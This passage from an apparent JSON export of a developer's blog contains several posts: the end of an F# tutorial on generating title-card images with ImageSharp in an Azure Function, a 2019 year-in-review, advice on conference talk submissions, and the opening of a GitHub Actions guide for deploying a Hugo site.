ctx.Fill(GraphicsOptions(true), colour, RectangularPolygon(gutter, yStart, cornerRadius, height - yStart - gutter)) |> ignore) // right gutter image.Mutate (fun ctx -> ctx.Fill (GraphicsOptions(true), colour, RectangularPolygon(width - xStart, yStart, cornerRadius, height - yStart - gutter)) |> ignore) // top gutter image.Mutate (fun ctx -> ctx.Fill(GraphicsOptions(true), colour, RectangularPolygon(xStart, gutter, width - xStart - gutter - cornerRadius, cornerRadius)) |> ignore) image Using the RectangularPolygon struct again we just manipulate some starting positions to fill in the three gaps with a rectangle the width (or height) of cornerRadius.\n🎉 We now have a box with rounded corners that looks like it is a single shape but is really made up of a bunch of smaller ones. A point to note is that you can simplify this a bit further by removing the left & right “fillers” and expanding the width of the inner box, but I found that doing so made it a lot harder to track how everything was drawn and positioned, so I’ll take the few extra CPU cycles as the cost of maintainability.\nAdding a Drop Shadow It wouldn’t be modern web design if we didn’t have a drop shadow to make everything pop and the simplest way for us to do a drop shadow of the box is to draw a second box at a slight offset that represents the shadow effect. Now in reality the shadow is drawn first on the canvas since we’re layering everything over the top of it. Let’s expand our generateBox function to have two more arguments that represents the offset of the shadow relative to the main box. Again this won’t be the most efficient solution as we’re going to be drawing a shadow for parts that aren’t visible, but again it’s a small cost of CPU cycles to make it more maintainable.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 let cornerRadius = 10.f let gutter = 20.f let generateBox (colour: Color) (width: float32) (height: float32) (xOffset: float32) (yOffset: float32) (image: Image<Rgba32>) = let xStart = gutter + cornerRadius let yStart = gutter + cornerRadius // main box image.Mutate(fun ctx -> ctx.Fill (GraphicsOptions(true), colour, RectangularPolygon (xStart + xOffset, yStart + yOffset, width - xStart - gutter - cornerRadius, height - yStart - gutter)) |> ignore) // left gutter image.Mutate(fun ctx -> ctx.Fill (GraphicsOptions(true), colour, RectangularPolygon(gutter + xOffset, yStart + yOffset, cornerRadius, height - yStart - gutter)) |> ignore) // right gutter image.Mutate(fun ctx -> ctx.Fill (GraphicsOptions(true), colour, RectangularPolygon(width - xStart + xOffset, yStart + yOffset, cornerRadius, height - yStart - gutter)) |> ignore) // top gutter image.Mutate(fun ctx -> ctx.Fill (GraphicsOptions(true), colour, RectangularPolygon (xStart + xOffset, gutter + yOffset, width - xStart - gutter - cornerRadius, cornerRadius)) |> ignore) // rounded corner - left top image.Mutate(fun ctx -> ctx.Fill (GraphicsOptions(true), colour, EllipsePolygon(xStart + xOffset, yStart + yOffset, cornerRadius * 2.f, cornerRadius * 2.f)) |> ignore) // rounded corner - right top image.Mutate(fun ctx -> ctx.Fill (GraphicsOptions(true), colour, EllipsePolygon(width - xStart + xOffset, yStart + yOffset, cornerRadius * 2.f, cornerRadius * 2.f)) |> ignore) image Here we have a liberal sprinkling of the offset values to shift the box right and down as that’s the direction we’re going with the shadow (assuming a positive offset is passed in, negative will go up and left).\nGenerating Text The final thing we need to do with our image is write the text that we want on it. We’ll be putting the title as the main heading and then a subheading that is the author name, published date and the tags. To generate the text we’ll use the SixLabors.Shapes.Text (version 1.0.0-beta0009 at the time of writing) and SixLabors.ImageSharp.Drawing (version 1.0.0-beta0007 at the time of writing) NuGet packages.\nDisclaimer: I struggled a lot with doing text properly and while I have a working solution, I’m not sure if it’s the most efficient. I primarily modeled it off this sample so if there’s a better way to do it, please let me know.\nLet’s add another function to ImageCreator.fs:\n1 2 let addText (text: string) (fontSize: float32) (xEnd: float32) (y: float32) (image: Image<Rgba32>) = image The first thing we need to do to render some text is to choose a font to render it using. For portability I’m going to pick a font off the host machine rather than trying to create one and we can do that with the SystemFont.Find method that the library provides. One thing to be aware of if you work across multiple OSes your available fonts will vary, I got caught out with this because I dev on Linux (via WSL2) but deployed to a Windows-hosted Azure Function, so the fonts were different!\n1 2 3 4 5 6 7 8 9 let getFontName = match Environment.OSVersion.Platform with | PlatformID.Unix -> "DejaVu Sans Mono" | _ -> "Consolas" let addText (text: string) (fontSize: float32) (xEnd: float32) (y: float32) (image: Image<Rgba32>) = let fam = getFontName |> SystemFonts.Find let font = Font(fam, fontSize) image To handle this OS-variation I use a function that checks the OS I’m on and gives me a different font name so I can find the right font family and from that create a Font object with the right fontSize.\nNow we need to generate a path which the text will be rendered along, this took a bit for me to understand but once I realised the point I realised how powerful it is. With ImageSharp each character in the string of text is a separate glyph that can be rendered and you can control where that goes relative to what’s preceded it. This makes it easy to have text follow a non-linear path (such as circular text) making complex text generation really easy. To do this we use a PathBuilder from SixLabors.Shapes and add points for shapes to appear on.\nBut we just need a straight path for the text to follow so we only need a single step in our path that goes through to nearly the edge of the image:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 let getFontName = match Environment.OSVersion.Platform with | PlatformID.Unix -> "DejaVu Sans Mono" | _ -> "Consolas" let addText (text: string) (fontSize: float32) (xEnd: float32) (y: float32) (image: Image<Rgba32>) = let fam = getFontName |> SystemFonts.Find let font = Font(fam, fontSize) let pb = PathBuilder() pb.SetOrigin(PointF(gutter * 2.f, 0.f)) |> ignore pb.AddLine(0.f, y, xEnd, y) |> ignore let path = pb.Build() image On line 11 we set where the first glyph will appear to be double the gutter width, so we end up with a consistent gap from the edges. Next we’ll add a line to be followed starting from the x position of the origin and a provided y position that will then run through to the right as far as we let it (the passed in xEnd value) with a consistent y. This results in a nice straight horizontal line for the text to follow. Finally we generate a path from the PathBuilder.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 let addText (text: string) (fontSize: float32) (xEnd: float32) (y: float32) (image: Image<Rgba32>) = let fam = getFontName |> SystemFonts.Find let font = Font(fam, fontSize) let pb = PathBuilder() pb.SetOrigin(PointF(gutter * 2.f, 0.f)) |> ignore pb.AddLine(0.f, y, xEnd, y) |> ignore let path = pb.Build() let mutable opts = TextGraphicsOptions true opts.WrapTextWidth <- path.Length let mutable ro = RendererOptions(font, 72.f) ro.HorizontalAlignment <- opts.HorizontalAlignment ro.TabWidth <- opts.TabWidth ro.VerticalAlignment <- opts.VerticalAlignment ro.WrappingWidth <- opts.WrapTextWidth ro.ApplyKerning <- opts.ApplyKerning image We need to create some options to control how the text is drawn onto the canvas (we’ll provide it to the Fill method eventually). First is the TextGraphicsOptions which is similar to the GraphicsOptions we used for shapes, but it has some text-specific properties, namely when to wrap. You might notice the mutable keyword on the let binding. This is because F# objects are immutable by default but we have to set some properties after construction (the same goes for RenderOptions).\nWith the TextGraphicsOptions created we can create the RendererOptions and copy some of the properties across. RendererOptions is used to control how the glyphs are created from the string of text so we provide it with the font we want to use and the DPI for the font.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 let addText (text: string) (fontSize: float32) (xEnd: float32) (y: float32) (image: Image<Rgba32>) = let fam = getFontName |> SystemFonts.Find let font = Font(fam, fontSize) let pb = PathBuilder() pb.SetOrigin(PointF(gutter * 2.f, 0.f)) |> ignore pb.AddLine(0.f, y, xEnd, y) |> ignore let path = pb.Build() let mutable opts = TextGraphicsOptions true opts.WrapTextWidth <- path.Length let mutable ro = RendererOptions(font, 72.f) ro.HorizontalAlignment <- opts.HorizontalAlignment ro.TabWidth <- opts.TabWidth ro.VerticalAlignment <- opts.VerticalAlignment ro.WrappingWidth <- opts.WrapTextWidth ro.ApplyKerning <- opts.ApplyKerning let glyphs = TextBuilder.GenerateGlyphs(text, path, ro) image.Mutate(fun ctx -> ctx.Fill(opts, Color.Black, glyphs) |> ignore) image With the options ready we can generate the glyphs along the path using the RendererOptions and then mutate the image to render out the text. But we’ve got a compilation error. It turns out that TextGraphicsOptions doesn’t inherit from GraphicsOptions, instead it relies on a custom explicit operator to convert. Well that’s annoying as F# doesn’t have a built-in way to handle the explicit casting like C#, instead you can call the op_Explicit function from the declaring type, or use a little snippet:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 #nowarn "77" let inline (!>) (x:^a) : ^b = ((^a or ^b) : (static member op_Explicit : ^a -> ^b) x) #warn "77" let addText (text: string) (fontSize: float32) (xEnd: float32) (y: float32) (image: Image<Rgba32>) = let fam = getFontName |> SystemFonts.Find let font = Font(fam, fontSize) let pb = PathBuilder() pb.SetOrigin(PointF(gutter * 2.f, 0.f)) |> ignore pb.AddLine(0.f, y, xEnd, y) |> ignore let path = pb.Build() let mutable opts = TextGraphicsOptions true opts.WrapTextWidth <- path.Length let mutable ro = RendererOptions(font, 72.f) ro.HorizontalAlignment <- opts.HorizontalAlignment ro.TabWidth <- opts.TabWidth ro.VerticalAlignment <- opts.VerticalAlignment ro.WrappingWidth <- opts.WrapTextWidth ro.ApplyKerning <- opts.ApplyKerning let glyphs = TextBuilder.GenerateGlyphs(text, path, ro) image.Mutate(fun ctx -> ctx.Fill(!> opts, Color.Black, glyphs) |> ignore) image Here we’re defining a custom operator, !>, that will handle the explicit cast for us (I don’t claim credit for it, credit to StackOverflow). We also disable the complier warning #77 which tells us to be careful about using op_Explicit as the compiler can do some optimisations with it, but it’ll be fine!\nBringing It All Together With our two core functions created it’s time to wire everything up and plug it into the Azure Function we started with. Since we’ll have to call each function a few times let’s create a helper makeImage function to get our Image<Rgba32> instance:\n1 2 3 let makeImage width height title author (date: DateTimeOffset) tags = let image = new Image<Rgba32>(int width, int height) image This function will take all the information it requires so it’s not tied to our parsing of the blog data. When creating the Image<Rgba32> we provide it a width and height, but they are defined as a float32 (since that’s mostly what we need them as) so they are boxed as int for the constructor (this is so ImageSharp can work with sub-pixel graphics but the final image is to a whole pixel).\nUp until now the background has been transparent, but let’s give it a colour to help it pop:\n1 2 3 4 5 let makeImage width height title author (date: DateTimeOffset) tags = let image = new Image<Rgba32>(int width, int height) image.Mutate(fun ctx -> ctx.Fill(Color.FromHex "02bdd5") |> ignore) image And finally we’ll call generateBox and addText\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 let makeImage width height title author (date: DateTimeOffset) tags = let image = new Image<Rgba32>(int width, int height) image.Mutate(fun ctx -> ctx.Fill(Color.FromHex "02bdd5") |> ignore) let textX = width - (gutter + cornerRadius) * 2.f let textY = height / 2.f generateBox (Color.FromHex "333") width height 5.f 5.f image |> generateBox Color.White width height 0.f 0.f |> addText title 30.f textX textY |> addText (sprintf "%s | %s" author (date.ToString "MMMM dd, yyyy")) 20.f textX (textY + 40.f) |> addText (tags |> Array.map (fun t -> sprintf "#%s" t) |> Array.toSeq |> String.concat " ") 15.f textX (textY + 70.f) Since all these methods return the Image<Rgba32> we can leverage F#’s pipeline operator to pass everything through in a nice pipeline. You’ll also see that when we call addText we start with the y position being half the height of the image (title is vertically aligned in the middle) and then increase the offset from that for the other lines of text so it doesn’t overlap.\nThe resulting output is an image like so:\nAll that is left now is to return that from the Azure Function.\nConnecting With Our Function 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 [<FunctionName("BlogCardGenerator")>] let run ([<HttpTrigger(AuthorizationLevel.Function, "get", Route = "title-card/{id}")>] req: HttpRequest) ([<Blob("title-cards/{id}.png", FileAccess.ReadWrite, Connection = "ImageStorage")>] postImage: ICloudBlob) (id: string) (log: ILogger) = async { log.LogInformation <| sprintf "ID: %s" id let! blogData = getBlogMetadata() match tryFindPost id blogData.Posts with | Some post -> let! exists = postImage.ExistsAsync() |> Async.AwaitTask if exists then log.LogInformation "Image existed" let! ms = downloadImage postImage return FileStreamResult(ms, "image/png") :> IActionResult else let title = post.Title let author = "Aaron Powell" let date = post.Date use image = makeImage width height title author date post.Tags let ms = imageToStream image do! postImage.UploadFromStreamAsync ms |> Async.AwaitTask ms.Position <- int64 0 return FileStreamResult(ms, "image/png") :> IActionResult | None -> return NotFoundResult() :> IActionResult } |> Async.StartAsTask We unpack the metadata from our post (title and tags) then call our makeImage function that returns us the Image<Rgba32> object. Since we know that it doesn’t already exist in storage we’ll write it back by converting it to a stream:\n1 2 3 4 5 let imageToStream (image: Image<Rgba32>) = let ms = new MemoryStream() image.SaveAsPng ms ms.Position <- int64 0 ms And using the ICloudBlob UploadFromStreamAsync function to write it. Once we reset the stream position it can be handed over to FileStreamResult and the client will get the image.\nConclusion I hope you’ve enjoyed this look at how we can generate and store images using Azure Functions and ImageSharp. If you’re looking at how to manipulate an existing image check out this tutorial which also uses ImageSharp.\nBut we were looking at the primitives, how to create the base shapes, overlap them appropriately and then draw some text across them.\nWe also saw how to combine the HTTP trigger with a Blob input binding so that we get a connection to our blobs setup without us needing to do a lot of the wire-up ourselves. If you want to see the complete solution you’ll find it on my GitHub.\nWe didn’t cover how to deploy to Azure, but there’s plenty of docs already on that. I’m using GitHub Actions for this project, you’ll find them here.\nAnd if you have any advice on how to improve the image generation let me know!\n", "id": "2020-01-03-generating-images-with-azure-functions" }, { "title": "2019 a Year in Review", "url": "https://www.aaron-powell.com/posts/2020-01-02-2019-a-year-in-review/", "date": "Thu, 02 Jan 2020 11:45:14 +1100", "tags": [ "year-review" ], "description": "A look back at the year that was", "content": "It’s only the 2nd of January and I’m already starting my Year In Review post?! It wasn’t until the 8th of January that I did my 2018 one.\nCareer-wise, 2019 has been a pretty massive year for me. I started it off by taking a job at Microsoft which has been a roller coaster ride. I’m nearly 12 months in, so I’ll update my 6 month’s at Microsoft when I hit that next milestone.\nBy the numbers it’s not surprised that I was so exhausted by the end of the year, I gave 6 conference talks (and another dozen or so user group talks), wrote 58 articles, took 11 trips over 2 countries with a total of just shy of 73,000km travelled.\nBlogging If I was to summarise what I did in 2019 it would be blogging. I spent a lot of time blogging this year, producing 58 new articles!\nOne of the goals I had on how I would blog this year was to look at doing more series-based blogs over lots of standalone pieces of content. I created a series on learning WebAssembly with Golang, dabbled with IoT, started diving into IL and looked at monitoring SPA’s. I find series a great way to explore an idea in a really deep way as you can focus each post on a single piece of the solution.\nI also started syndicating my content through to the DEV community as an experiment on extending my reach, which may come as a surprise if you’ve read my previous writings around content ownership. It’s nearly 12 months into the experiment and I think I have some insights out of it.\nSpeaking I was rejected a lot in 2019 from conferences but I still got to a number of events and was able to get a good amount of value out of them (plus do more than enough travel for the year!). The negative to this was that I was unable to get to some of the user groups that I was previously a frequent attendee at, so I started to disengage with some communities. My hope is that in 2020 I’ll be able to better prioritise my time and get back to some of these events.\nNew Site If you’re a regular reader via the browser of my site you may notice it looks different to how it use to look. I decided that the design of my blog was a little tired and I wanted to update it. After shopping around the Hugo theme gallery I found one I quite liked and installed it, unfortunately it turned out to rely on around 10 jQuery plugins, some CSS frameworks and a bunch of other bloat that blew me away as to how heavy it was. So that led to this tweet.\nI'm doing my first website design from scratch with no frameworks after like 10 years.\nWhere are some good references on what are good baseline dimensions for content width, etc.?\n— Aaron Powell (@slace) December 4, 2019 Over the course of a few weeks in December I chipped away at a new theme for my website, inspired by themes I liked, that the CSS is written from entirely without a template. This is the first time I’ve done “from scratch” CSS in a long time and it’s been an interesting experience. I know my site isn’t 100% perfect so if you hit anything that’s broken/ugly/etc. please log a bug on this GitHub repo.\nI’ve added to the site is a section about my public speaking with a link to a number of talk abstracts I can give as well as upcoming and past speaking engagements. You’ll also see a list of upcoming speaking engagements on the homepage.\nI also created a little tool that’ll generate images for sharing posts where the Open Graph Protocol is used so there’s a pretty title card, rather than a huge photo of me like it use to show.\nLooking Forward What am I hoping to achieve in 2020? Well to kick off the year I have a lot of travel lined up so my main goal is to not get divorced! 😆\nJokes aside, I’m going to be trying to focus more on some of my core technologies, JavaScript and .NET in particular. My hope is to get back into some of the Sydney tech communities and see how best I can support them in a number of different ways.\nHope to see you around some events!\n", "id": "2020-01-02-2019-a-year-in-review" }, { "title": "Reflecting on 12 Months Submitting to Conferences", "url": "https://www.aaron-powell.com/posts/2019-12-19-reflecting-on-12-months-submitting-to-conferences/", "date": "Thu, 19 Dec 2019 09:52:00 +1100", "tags": [ "speaking" ], "description": "You win some, you loose some, but that's how conferences go.", "content": "A few weeks ago I put up what was intended to be a throw-away tweet.\nGoing over my talk submissions for 2019. This is my hit-rate from just one submission tool.\nRemember folks, you'll be rejected from a lot more talks than you are accepted! pic.twitter.com/4sbcn1QhrS\n— Aaron Powell (@slace) November 29, 2019 This tweet shows the success, or lack-there-of when it came to submitting to conferences this year, and this is only a snapshot of one platform, Sessionize, that I’ve submitted via. I also have rejections in Papercall.io and countless Google Form’s. So from 4 talks across 7 events (total of 8 submissions) I only had 1 talk accepted. That’s not 100% accurate from Sessionize, I actually submitted 16 sessions across 7 different talks to 7 events, of which 1 was selected. Wait, that doesn’t sound any better! 😕\nTaking all other systems into account I presented 6 talks at 6 events (and attended a few others) and was rejected from at least that many events on top of what you see in the screenshots above.\nThe tweet I put up sparked some good discussions with people about getting into speaking at events so I thought I’d take some time to share a bit of my experience.\nI gave my first conference a decade ago at the very first DDD Melbourne. When I gave that talk I’d only attended a single conference, that was the Umbraco conference in Copenhagen, but I hadn’t been there to speak, just attend as a contributor to the project. Back in 2010 the conference scene was very different to what it is now, there wasn’t that many events and the events that existed tended to be vendor-centric events, like Microsoft TechEd, with thousands of attendees and a price-point to match. So when I saw people talking about DDD Melbourne I was interested in the idea of a conference that I could attend without needing to raise a lot of money for and that I, as a nobody in the tech community, could submit a talk to with the hope of presenting.\nFast forward to 2019 and I’ve been lucky enough to speak at dozens of events around Australia and the world and made it part of my job. But for every event I’ve spoken at there’s many more that I was rejected from, I wouldn’t have a clue how many talks I’ve been rejected from over the years, it’s beyond the point where I’d bother to keep count.\nAnd with the doom and gloom aside, let’s talk about some positive and practical things around getting into conferences.\nRejection Is Part Of Life This doesn’t sound like a positive first point, but hear me out. When you break it down it’s a numbers game, there’s only so many slots at a conference and only so many conferences that you’re almost always going to be over-indexed in the number of submissions. I’ve worked on the agenda for NDC Sydeny twice and each year we would receive over 600 submissions for the approximately 100 slots to fill (taking into account pre-booked speakers).\nSo going in with the understanding that you may not make it in and that isn’t the end of the world is a good perspective to have. Some events will be able to provide feedback on why your talk wasn’t selected but in my experience, there aren’t many events that can do that. Take NDC Sydney for example, it’s hard to be able to give personalised feedback to a few hundred people, but also sometimes the reasons are that there were just too many good talks and a coin was flipped.\nAnd don’t be a sore loser if you aren’t accepted. It’s frustrating and you might want to share your frustration on twitter by saying a conference has played favourites or had some unfair biases in the selection. That’s not going to help you and it’s more likely that you’d end up on a blacklist instead. Many conferences do have blacklists, whether they are people who violated the code of conduct, presented a misleading talk (turned out to be a blatant sales pitch) or presented themselves in a way that is against how the conference wants to be represented.\nWith that in mind, what can you do to improve your odds?\nRestrict The Number Of Submissions Some events are starting to place limits on the number of talks that they will accept from potential speakers, but not all do. If you’re submitting to an event without a submission cap don’t look at that as a license to go crazy. I’ve been on the agenda team for events where there have been people submitting upwards of 10 talks. When I see this it makes me wonder if the person has a handle on what they can bring to the event or are they just throwing everything at the wall with the hope that something sticks. And to have produced that many abstracts, how much time has gone into thinking through the story that you want to give to the audience?\nHaving only a small number of talks that you are constantly refining will help to solidify who you are and why you are an authority to speak on such a topic. Which leads me to the next point.\nAre You Known For That? While most events will anonymously do initial reviews, at some points they will look at the name of who submitted the talk and use that as part of the final decision. Conferences will strive to have the people speaking be people who are knowledgable on a topic, an authority if you will, so what makes you that person? Have you been writing about it on a blog? Answering questions of Stack Overflow? Discussing it on Twitter? Presenting at meetups about it?\nThis can be the difference when it comes to final reviews of sessions when you’ve got similar content or just a lot of really strong options to pick from.\nFor me, I tend to extract talk ideas out of blog posts that I’ve written. This means that I’ve been able to “prove” the content in the market by writing about a topic and that there’s more than just a single talk submission to show that I know what I’m talking about. And this is why it’d be unlikely that I’d submit a talk about Kubernetes to a conference, as I have no previously demonstrated knowledge in that area.\nReuse Some people think that for each event they submit to the talk needs to be 100% new meaning they are always trying to come up with new ideas and are exhausted at the prospect. This isn’t the case though. Now, I wouldn’t be submitting the same talk to the same conference but that doesn’t mean that you can’t submit it to other events. After all, the attendees aren’t going to all the same at each event, especially if you’re submitting to events in multiple different cities/countries.\nI, in fact, have a talk about Docker that I’ve been giving at least once per year for the last three years and I hope to keep giving it. Giving the same talk multiple times can be really enjoyable. You get an opportunity to refine it from the previous deliveries, expand on areas based on feedback and avoid the stress of having to write a new talk in the lead up to a conference!\nEach year I’ll produce a couple of new talk ideas, retire some old ones and continue to refine my favourites.\nYour Submission This is the critical piece of the puzzle to getting accepted, if you don’t write a submission you’re really unlikely to get accepted! 🤣\nBut how do we go about writing a good submission? There are countless articles online about this and I’ll share what I’ve learnt over the years.\nThe Title I’d argue that the title is the most important piece of information about your talk. It’s the hook that you use to get people to read more, whether it’s those reviewing the agenda or at attendee at the event.\nThe title should be short and to the point, but it’s also a place where you can inject a bit of your personality (I like to use wordplay in the titles I created, but that’s not for everyone). Let’s take the title of one of my favourite talks, Docker, FROM scratch. Here it’s clear what the tech we’ll be covering is, it’s Docker, and read literally, the talk implies it’s something beginner centric or getting basic. Then there’s the fact that FROM is capitalised in it, and if you haven’t used Docker you’re going to assume there’s a reason for it, whereas if you have used Docker you’ll identify that it’s from a Dockerfile.\nAlso, try to avoid being too cliche with titles. Phrases like “from the trenches” are overdone and I would avoid using them. Similarly with click-bait style titles, they often just come across as gimmicky.\nThe Abstract While the title is to grab someone’s attention the abstract is to sell the talk. Like a title you want it to be to the point, no more than a few paragraphs, remember, your goal is to get people to attend your talk and learn something, not to learn it all from the abstract. I like to start by framing the narrative I plan to tell.\nDocker’s popularity has exploded over the last couple of years, especially in the DevOps space, but unless you’ve spent a lot of time in that area it can be a confusing technology to wrap your head around.\nFrom here you can then go into why you’re the one to talk about this, how you’ll show off your knowledge, etc.\nAn abstract can be written in either the first or third person and that will come down to how you like to represent your talk idea. When I write an abstract around a particular bit of tech/product/problem I’ll often go to third person.\nWe’ll look at how to apply x to y.\nWhereas if I’m writing a talk that’s purely about my experience I’ll go to first person.\nI’ll show you how I learnt about x.\nBut experiment with it, see what reads well when you read it back.\nAlso think about creating an elevator pitch, a single sentence that summarises your talk as some events may use that.\nYour Bio The final main piece of any submission is your bio. Use it to tell people who you are and why you are the person who should speak on a particular topic. Keep it short, only a paragraph or two, don’t mistake this for a resume, focus on the information about you that is relevant for the event, if you’re submitting to a front-end web event, your in-depth knowledge of SQL Server might not be that important.\nI like having a couple of different length bios, a one-liner for meetups and summaries plus a full bio for conferences.\nSubmission Don’t When it comes to writing your submission there are a few things that will hurt rather than help you.\na long and rambling abstract that lacks any form of punctuation grammer correct spelling or capitalisation will not be doing you any favours so remember that you should always put it through a spell checker and or a grammar checker even something as simple as pasting it into a word document to do a sanity check before submitting will be valuable as a poorly written abstract doesn’t do much to help your credibility as someone who is knowledgable in a certain area.\nThe same can be said about your title and bio, if you can’t take the time to ensure you’ve spelt words correctly, properly cased product names or ensured you have punctuation, how does that give confidence to the event that you’ll put the effort in for them?\nSpeaking of professionalism, don’t be overly critical of things in your abstract. Your talk may be about one framework when there are others, but don’t bad-mouth the others, it’s not going to be constructive nor will it show that you’re being objective.\nGet A Peer Review Once you’ve written everything down as friends and co-workers to have a read of it and give you their thoughts, after all, they are the kind of people who you want to attend the talk, so why not see if they are finding it interesting.\nWhere To Submit This is probably important isn’t it, after all, if you don’t have somewhere to submit your talk then what’s the point? 🤔\nTrying to work out what’s on when can be difficult, with dozens of events happening around Australia and most of them announcing via Twitter it’s easy to miss them. My first point of call is to check out the DevEvents GitHub repository, which is a crowd-sourced list of conferences happening around Australia including important dates and a link to the event (and if you learn of one that’s not there, submit a PR!).\nBe aware that a lot of conferences in Australia happen between August and November, probably related to the new financial year budgets being available to sponsors, but this can result in a mad rush of events opening their Call For Papers (CFP) and a lot of travel in a short period.\nWhen To Write The Talk You’ve written a submission that you’re excited about, so it’s time to sit down and write the talk right? I hold off, I won’t start writing my slides/demos until after I know I’m giving a talk. Mainly I do this because I don’t want to “waste the effort” in writing a talk I might never deliver. But given that a lot of the talks I do are based off blogs that I’ve previously written I will have a starting point that I can write the talk from, which I find speeds up the process.\nConclusion This is a bit of a random hodge-podge of ideas rolled together into a post based on my experience on public speaking over the last 10 years.\nIt might look like it’s been a tough year, doing 6 talks out of the ~30 submissions, but it’s pretty standard. Sure, it’s frustrating when you submit a talk that you’re really excited to deliver only to have it rejected, but it’s not the end of the world.\nIf you’re looking to get into conferences I’d encourage you to attend a Global Diversity CFP Day if there’s one in a city near you. Also, here’s two articles that I think are quite helpful in creating a good submission.\nI’m also happy to review topics for people before they submit, just drop me a message.\nGood luck!\n", "id": "2019-12-19-reflecting-on-12-months-submitting-to-conferences" }, { "title": "Implementing GitHub Actions for My Blog", "url": "https://www.aaron-powell.com/posts/2019-12-17-implementing-github-actions-for-my-blog/", "date": "Tue, 17 Dec 2019 08:50:14 +1100", "tags": [ "devops", "azure" ], "description": "A look at how to deploy a Hugo static website to Azure Static Websites and Azure CDN.", "content": "While I was doing the work to host my Blazor search app within my website I realised I’d need to update the deployment pipeline I use for my blog. The process being used was very similar to the one used for the DDD Sydney website, but tweaked for use with Hugo. As it was setup a while ago I used the UI designer in Azure Pipelines, not the YAML approach so this seemed like the perfect opportunity for an overhaul.\nBut if I’m going to go in for an overhaul and port to YAML I decided it was time to learn something that’d been on my backlog, GitHub Actions, after all, I’ve used Azure Pipelines extensively, so why not learn something new and compare/contrast the two products?\nThe Moving Parts With my website there are three pieces that I need to handle, generating a static website using Hugo, generating the Blazor WebAssembly application and deploying to Azure Static Websites while updating Azure CDN. I’ll try and break this article down into those three pieces so that if one of them isn’t relevant to you it’ll be easy to focus on the parts you need most.\nMy First Action If you haven’t worked with GitHub Actions yet, they appear under a new tab on your repository called Actions. With GitHub Actions you create a Workflow that will run on a number of different triggered events in GitHub, issues being created, PR’s raised, commits pushed and many others. There’s a guide that you can follow along in the GitHub UI to get started, but if you’re wanting to start in an editor the first thing you’ll need to do is create a new folder in your repo, .github/workflows, and add a YAML file to it. This file can be named anything, so long as it has a .yml or .yaml extension, mine is named continuous-integration.yml.\nFrom here we can define the metadata about our Workflow:\n1 name: Build and Deploy Website Environment variables:\n1 2 env: OUTPUT_PATH: ${{ github.workspace }}/.output And what triggers the Workflow:\n1 2 3 4 on: push: branches: - master This gives us a starting like so:\n1 2 3 4 5 6 7 8 name: Build and Deploy Website env: OUTPUT_PATH: ${{ github.workspace }}/.output on: push: branches: - master In which we can then create jobs, which are the things our Workflow does.\n1 2 3 4 jobs: job_name: runs-on: <platform> steps: <steps to run> The runs-on is similar to the pool in Azure Pipelines and is used to specify the platform that the Workflow will run on (Linux, MacOS or Windows). After that, we define some steps for what our Job does by specifying Actions to use from the marketplace or commands to run.\nSteps will often have a uses directive which specifies the Action to run the step “tasks” under. This will either get something from the Actions marketplace or a custom Action within your git repo.\nMy colleague Tierney Cyren has a fantastic intro guide that you should check out to understand the building blocks (I used it as a reference myself when creating this Workflow!).\nAnd with the primer handled let’s start creating jobs for each piece we need to handle.\nTermonology Summary Just to summarise some of the new terms we’ve been introduced to:\nGitHub Actions - the product we’re using from GitHub Actions - things we can get from the marketplace (or build ourself) that defines what we can do Workflow - A series of Environment Variables, Jobs and Steps undertaken when an event happens Jobs - What our Workflow does Steps - A task undertaken by a Job using an Action Generating The Static Website My blog uses Hugo, a simple static website generator written in Golang that consists of a single binary. All the content I need for my blog is in my GitHub repo and I even keep the Hugo binary in there so it’s easy to just clone-and-run. So it’s really simple, but let’s look at how to do it via GitHub Actions.\nLet’s start by defining a Job for this Workflow:\n1 2 3 jobs: build_hugo: runs-on: ubuntu-latest The Job name is build_hugo, I like to name things with a prefix for their role (build or deploy) and the role it’s performing, but the naming convention is up to you, just make sure it makes enough sense for when you look at it in 2 months!\nI’ve specified that we’re going to use the ubuntu-latest image as our base because Hugo can run on Linux and it’s a simple image to use.\nThis Job is a “Continuous Integration” Job, meaning it needs access to the “stuff” in our git repository so the first step we’re going to want to perform is a git checkout, and for that we can use the actions/checkout@v1 Action (note: I’m pinning the version to v1):\n1 2 3 4 build_hugo: runs-on: ubuntu-latest steps: - uses: actions/checkout@v1 This Action doesn’t require anything other than to be used for the checkout to happen on master, but if you’re using it with a PR you might want to tweak it. For that check out the Action documentation.\nBuilding Hugo in an Action Given I have the Hugo binary in the git repo I could just run that as a shell script, but I decided to look at whether or not I could do it “more Action-y” and I was pointed to peaceiris/actions-hugo. This is a pre-built Action designed to work with Hugo.\nOutputting Information from a Step When we use the Hugo Action we need to give it the version of Hugo that we want to use (which it’ll download for us), and I figured that since I have the Hugo binary, why not ask it what version it is? Let’s add another Step to our Job that runs a script on the default shell:\n1 2 3 4 5 6 7 8 9 10 build_hugo: runs-on: ubuntu-latest steps: - uses: actions/checkout@v1 - name: Get Hugo Version id: hugo-version run: | HUGO_VERSION=$(./hugo version | sed -r 's/^.*v([0-9]*\\.[0-9]*\\.[0-9]*).*/\\1/') echo "::set-output name=HUGO_VERSION::${HUGO_VERSION}" This runs the ./hugo version command to give me a rather verbose string that is passed to an ugly sed regex to generate an environment variable available within this Step. But since we’ll need it in a different Step we have to turn it into Step Output, and we do that with this line:\n1 echo "::set-output name=HUGO_VERSION::${HUGO_VERSION}" If you’ve used Azure Pipelines it’s similar to the ##vso[task.setvariable variable=MyVar]some-value weirdness you may have used.\nThe other bit of information you need on the Step is the id, as that is how you can refer to it from other Steps.\nGenerating Hugo Output With the Hugo version in hand we can now generate the HTML output:\n1 2 3 4 5 6 7 - name: Setup Hugo uses: peaceiris/actions-hugo@v2.3.0 with: hugo-version: "${{ steps.hugo-version.outputs.HUGO_VERSION }}" - name: Build run: hugo --minify --source ./src --destination ${{ env.OUTPUT_PATH }} The Setup Hugo Step uses our marketplace Action (peaceiris/actions-hugo@v2.3.0) and sets the version by looking back to the previous Step output. Then we run a build step using the hugo 